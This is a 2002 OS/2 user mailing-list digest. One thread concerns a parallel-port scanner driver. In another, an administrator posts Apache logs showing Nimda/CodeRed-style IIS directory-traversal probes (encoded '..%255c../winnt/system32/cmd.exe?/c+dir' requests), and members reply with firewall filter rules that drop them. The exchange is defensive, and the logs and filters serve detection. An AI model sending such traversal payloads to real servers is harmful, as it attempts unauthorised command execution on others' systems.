From: Digest To: "OS/2GenAu Digest" Date: Fri, 8 Nov 2002 00:02:01 EST-10EDT,10,-1,0,7200,3,-1,0,7200,3600 Subject: [os2genau_digest] No. 485 Reply-To: X-List-Unsubscribe: www.os2site.com/list/ ************************************************** Thursday 07 November 2002 Number 485 ************************************************** Subjects for today 1 Re: [os2genau] Flatbed scanner, parallelport. : Kenneth Bucio 2 Re: [os2genau] Flatbed scanner, parallelport. : Kenneth Bucio 3 [os2genau] Apache log : brianb at kdfisher dot com dot au 4 Re: [os2genau] Apache log : Ian Manners" 5 Re: [os2genau] Apache log : brianb at kdfisher dot com dot au 6 [os2genau] Ian Manners Off List discussion : brianb at kdfisher dot com dot au 7 Re: [os2genau] Apache log : Chris Graham [WarpSpeed]" 8 Re: [os2genau] Apache log : Ian Manners" 9 Re: [os2genau] Flatbed scanner, parallelport. : Alan Duval" **= Email 1 ==========================** Date: Wed, 06 Nov 2002 20:51:23 +0100 From: Kenneth Bucio Subject: Re: [os2genau] Flatbed scanner, parallelport. Hi. Thank you for your proposals. Now I have something to try. rgds. Kenneth Bucio ---------------------------------------------------------------------------------- **= Email 2 ==========================** Date: Wed, 06 Nov 2002 23:12:22 +0100 From: Kenneth Bucio Subject: Re: [os2genau] Flatbed scanner, parallelport. That is correct. Kenneth Bucio Ed Durrant wrote: >Hi Brian > >............................his scanner is a parrallel port model >not a SCSI one. > >Ed. > > ---------------------------------------------------------------------------------- **= Email 3 ==========================** Date: Thu, 7 Nov 2002 12:12:00 +0930 From: brianb at kdfisher dot com dot au Subject: [os2genau] Apache log Hi all, I have found a set of entries in the Apache logs that I need explaining. It seems somebody is trying to break in to the system but I am unable to figure out just what they are up to. They seem to think they are on an NT machine not an OS/2 machine. I would appreciate any advice! The relevant entries follow. Access Log ========== 202.98.249.147 - - [05/Nov/2002:14:36:52 +0000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 286 202.98.249.147 - - [05/Nov/2002:14:36:54 +0000] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 284 202.98.249.147 - - [05/Nov/2002:14:36:59 +0000] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 294 202.98.249.147 - - [05/Nov/2002:14:37:03 +0000] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 294 202.98.249.147 - - [05/Nov/2002:14:37:05 +0000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 202.98.249.147 - - [05/Nov/2002:14:37:16 +0000] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325 202.98.249.147 - - [05/Nov/2002:14:37:17 +0000] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325 202.98.249.147 - - [05/Nov/2002:14:37:19 +0000] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 341 202.98.249.147 - - [05/Nov/2002:14:37:24 +0000] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307 202.98.249.147 - - [05/Nov/2002:14:37:26 +0000] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307 202.98.249.147 - - [05/Nov/2002:14:37:27 +0000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307 202.98.249.147 - - [05/Nov/2002:14:37:29 +0000] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307 202.98.249.147 - - [05/Nov/2002:14:37:31 +0000] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 291 202.98.249.147 - - [05/Nov/2002:14:37:32 +0000] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 291 202.98.249.147 - - [05/Nov/2002:14:37:34 +0000] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 202.98.249.147 - - [05/Nov/2002:14:37:36 +0000] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 211.161.25.98 - - [06/Nov/2002:08:22:19 +0000] "GET http://www8.big.or.jp/~000/CyberSyndrome/evc.html HTTP/1.0" 404 297 211.161.25.98 - - [06/Nov/2002:08:22:22 +0000] "GET http://www8.big.or.jp/~000/CyberSyndrome/evc.html HTTP/1.0" 404 297 211.161.25.98 - - [06/Nov/2002:08:22:43 +0000] "GET http://www8.big.or.jp/~000/CyberSyndrome/evc.html HTTP/1.0" 404 297 211.161.25.98 - - [06/Nov/2002:08:23:31 +0000] "GET http://www8.big.or.jp/~000/CyberSyndrome/evc.html HTTP/1.0" 404 297 211.161.25.98 - - [06/Nov/2002:08:24:35 +0000] "GET http://www8.big.or.jp/~000/CyberSyndrome/evc.html HTTP/1.0" 404 297 211.161.25.98 - - [06/Nov/2002:08:25:40 +0000] "GET http://www8.big.or.jp/~000/CyberSyndrome/evc.html HTTP/1.0" 404 297 211.161.25.98 - - [06/Nov/2002:08:26:43 +0000] "GET http://www8.big.or.jp/~000/CyberSyndrome/evc.html HTTP/1.0" 404 297 211.161.25.98 - - [06/Nov/2002:08:27:47 +0000] "GET http://www8.big.or.jp/~000/CyberSyndrome/evc.html HTTP/1.0" 404 297 211.161.25.98 - - [06/Nov/2002:08:28:51 +0000] "GET http://www8.big.or.jp/~000/CyberSyndrome/evc.html HTTP/1.0" 404 297 211.161.25.98 - - [06/Nov/2002:08:29:55 +0000] "GET http://www8.big.or.jp/~000/CyberSyndrome/evc.html HTTP/1.0" 404 297 211.161.25.98 - - [06/Nov/2002:08:30:59 +0000] "GET http://www8.big.or.jp/~000/CyberSyndrome/evc.html HTTP/1.0" 404 297 211.161.25.98 - - [06/Nov/2002:08:32:03 +0000] "GET http://www8.big.or.jp/~000/CyberSyndrome/evc.html HTTP/1.0" 404 297 211.161.25.98 - - [06/Nov/2002:08:33:07 +0000] "GET http://www8.big.or.jp/~000/CyberSyndrome/evc.html HTTP/1.0" 404 297 Error Log ======== [Tue Nov 5 14:36:52 2002] [error] [client 202.98.249.147] File does not exist: e:/apache/htdocs/scripts/root.exe [Tue Nov 5 14:36:54 2002] [error] [client 202.98.249.147] File does not exist: e:/apache/htdocs/msadc/root.exe [Tue Nov 5 14:36:59 2002] [error] [client 202.98.249.147] File does not exist: e:/apache/htdocs/c/winnt/system32/cmd.exe [Tue Nov 5 14:37:03 2002] [error] [client 202.98.249.147] File does not exist: e:/apache/htdocs/d/winnt/system32/cmd.exe [Tue Nov 5 14:37:05 2002] [error] [client 202.98.249.147] File does not exist: e:/apache/htdocs/scripts/..%5c/winnt/system32/cmd.exe [Tue Nov 5 14:37:16 2002] [error] [client 202.98.249.147] File does not exist: e:/apache/htdocs/_vti_bin/..%5c/..%5c/..%5c/winnt/system32/cmd.exe [Tue Nov 5 14:37:17 2002] [error] [client 202.98.249.147] File does not exist: e:/apache/htdocs/_mem_bin/..%5c/..%5c/..%5c/winnt/system32/cmd.exe [Tue Nov 5 14:37:19 2002] [error] [client 202.98.249.147] File does not exist: e:/apache/htdocs/msadc/..%5c../..%5c../..%5c/..Á../..Á.../..Á ../winnt/system32/cmd.exe [Tue Nov 5 14:37:24 2002] [error] [client 202.98.249.147] File does not exist: e:/apache/htdocs/scripts/..Á../winnt/system32/cmd.exe [Tue Nov 5 14:37:27 2002] [error] [client 202.98.249.147] File does not exist: e:/apache/htdocs/scripts/..À¯/winnt/system32/cmd.exe [Tue Nov 5 14:37:29 2002] [error] [client 202.98.249.147] File does not exist: e:/apache/htdocs/scripts/..Á?/winnt/system32/cmd.exe [Tue Nov 5 14:37:34 2002] [error] [client 202.98.249.147] File does not exist: e:/apache/htdocs/scripts/..%5c/winnt/system32/cmd.exe [Tue Nov 5 14:37:36 2002] [error] [client 202.98.249.147] File does not exist: e:/apache/htdocs/scripts/..%2f/winnt/system32/cmd.exe [Wed Nov 6 08:22:19 2002] [error] [client 211.161.25.98] File does not exist: e:/000/public_html/cybersyndrome/evc.html [Wed Nov 6 08:22:22 2002] [error] [client 211.161.25.98] File does not exist: e:/000/public_html/cybersyndrome/evc.html [Wed Nov 6 08:22:43 2002] [error] [client 211.161.25.98] File does not exist: e:/000/public_html/cybersyndrome/evc.html [Wed Nov 6 08:23:31 2002] [error] [client 211.161.25.98] File does not exist: e:/000/public_html/cybersyndrome/evc.html [Wed Nov 6 08:24:35 2002] [error] [client 211.161.25.98] File does not exist: e:/000/public_html/cybersyndrome/evc.html [Wed Nov 6 08:25:40 2002] [error] [client 211.161.25.98] File does not exist: e:/000/public_html/cybersyndrome/evc.html [Wed Nov 6 08:26:43 2002] [error] [client 211.161.25.98] File does not exist: e:/000/public_html/cybersyndrome/evc.html [Wed Nov 6 08:27:47 2002] [error] [client 211.161.25.98] File does not exist: e:/000/public_html/cybersyndrome/evc.html [Wed Nov 6 08:28:51 2002] [error] [client 211.161.25.98] File does not exist: e:/000/public_html/cybersyndrome/evc.html [Wed Nov 6 08:29:55 2002] [error] [client 211.161.25.98] File does not exist: e:/000/public_html/cybersyndrome/evc.html [Wed Nov 6 08:30:59 2002] [error] [client 211.161.25.98] File does not exist: e:/000/public_html/cybersyndrome/evc.html [Wed Nov 6 08:32:03 2002] [error] [client 211.161.25.98] File does not exist: e:/000/public_html/cybersyndrome/evc.html [Wed Nov 6 08:33:07 2002] [error] [client 211.161.25.98] File does not exist: e:/000/public_html/cybersyndrome/evc.html ----------------------------------------- Brian Butler System Administrator brianb at kdfisher dot com dot au ---------------------------------------------------------------------------------- **= Email 4 ==========================** Date: Thu, 07 Nov 2002 12:48:51 +1100 (EDT) From: "Ian Manners" Subject: Re: [os2genau] Apache log Hi Brian >They seem to think they are on an NT machine not >an OS/2 machine. Just kiddie scripters, no need to worry you can safely ignore it. I have an entry in my firewall to drop those packages to keep my logs cleaner for viewing, actually, I have several entrys to remove all sorts of scans from kiddie scripters, worms, etc. You should join the Apache list at http://silk.apana dot org dot au/mailman/listinfo/apache2 Cheers Ian B Manners http://www.os2site dot com/ 121. You never really learn to swear until you learn to drive. ---------------------------------------------------------------------------------- **= Email 5 ==========================** Date: Thu, 7 Nov 2002 12:18:44 +0930 From: brianb at kdfisher dot com dot au Subject: Re: [os2genau] Apache log Ian, Thanks. I will get on the Apache list. ----------------------------------------- Brian Butler System Administrator brianb at kdfisher dot com dot au ---------------------------------------------------------------------------------- **= Email 6 ==========================** Date: Thu, 7 Nov 2002 13:28:56 +0930 From: brianb at kdfisher dot com dot au Subject: [os2genau] Ian Manners Off List discussion Ian, Could you send me your off list e-mail address please. I would like to discuss some aspects of web site security with you off the genau list. Thanks ----------------------------------------- Brian Butler System Administrator brianb at kdfisher dot com dot au ---------------------------------------------------------------------------------- **= Email 7 ==========================** Date: Thu, 07 Nov 2002 21:58:55 +1100 (EDT) From: "Chris Graham [WarpSpeed]" Subject: Re: [os2genau] Apache log On Thu, 07 Nov 2002 12:48:51 +1100 (EDT), Ian Manners wrote: >Hi Brian > >>They seem to think they are on an NT machine not >>an OS/2 machine. > >Just kiddie scripters, no need to worry you can safely ignore >it. I have an entry in my firewall to drop those packages to >keep my logs cleaner for viewing, actually, I have several >entrys to remove all sorts of scans from kiddie scripters, >worms, etc. InJoy filter scripts? Care to share them? Yes, I'd like to be able to drop the odd bad/malicious packet. >You should join the Apache list at > http://silk.apana dot org dot au/mailman/listinfo/apache2 > >Cheers >Ian B Manners >http://www.os2site dot com/ > > >121. You never really learn to swear until you learn to drive. > > -Chris WarpSpeed Computers - The Graham Utilities for OS/2. Voice: +61-3-9307-0611 PO Box 212 FidoNet: 3:632/344 FAX: +61-3-9307-0633 Brunswick Internet: chrisg at warpspeed dot com dot au BBS: +61-3-9307-0644 VIC 3056 CompuServe: 100250,1645 300-28,800 N,8,1 ANSI Australia Web Page: http://www.warpspeed dot com dot au ---------------------------------------------------------------------------------- **= Email 8 ==========================** Date: Thu, 07 Nov 2002 23:03:34 +1100 (EDT) From: "Ian Manners" Subject: Re: [os2genau] Apache log Hi Chris >InJoy filter scripts? >Care to share them? DROP-RUBBISH Filter-Status = Always, Filter-Root = Yes, Comment = "Drop exe?/c+ probes", Filter-Scope = Incoming-Packets, Protocol = TCP, Port = 80, Offset-Relativity = Data-Start, Offset = Search-All, Hex-String = "\x65\x78\x65\x3F\x2F\x63\x2B", Action = Drop-Packet, DROP-CODERED Filter-Status = Always, Filter-Root = Yes, Comment = "Remove CodeRed via Hex-String match", Filter-Scope = Incoming-Packets, Offset-Relativity = Data-Start, Offset = Search-All, Hex-String = "\x64\x65\x66\x61\x75\x6C\x74\x2E\x69\x64\x61", Action = Drop-Packet, These need to be the first filters in the file, also note that they can be plain text, ie :- Hex-String = "exe?/c+", will also work, I just get into hex mode sometimes. Cheers Ian B Manners http://www.os2site dot com/ Does the name Pavlov ring a bell? ---------------------------------------------------------------------------------- **= Email 9 ==========================** Date: Thu, 07 Nov 2002 22:18:13 -0500 (EST) From: "Alan Duval" Subject: Re: [os2genau] Flatbed scanner, parallelport. On Wed, 06 Nov 2002 01:27:22 +0100, Kenneth Bucio wrote: >Hi all. > >Can anyone help me? >I have got a Plustek OpticPro 96000P scanner without any kind of software. >I have looked for drivers, but they are all for SCSI but my scanner is >designed to be connected to my parallel port. >What do I do? > >Warp 4, fp 15, ASUS K7M slot A m.board. > >Best rgds. Kenneth Bucio Might be worth downloading Copyshop2 from Hobbes as it has a driver with it. Regards Alan Duval ----------------------------------------------------------------------------------